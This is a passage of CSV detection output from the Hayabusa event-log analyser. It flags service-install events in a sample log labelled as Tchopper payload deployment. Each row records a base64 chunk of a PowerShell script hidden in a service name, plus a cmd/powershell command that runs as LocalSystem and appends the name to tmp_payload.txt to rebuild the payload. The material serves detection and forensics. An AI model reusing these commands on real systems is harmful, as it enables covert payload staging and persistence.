MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 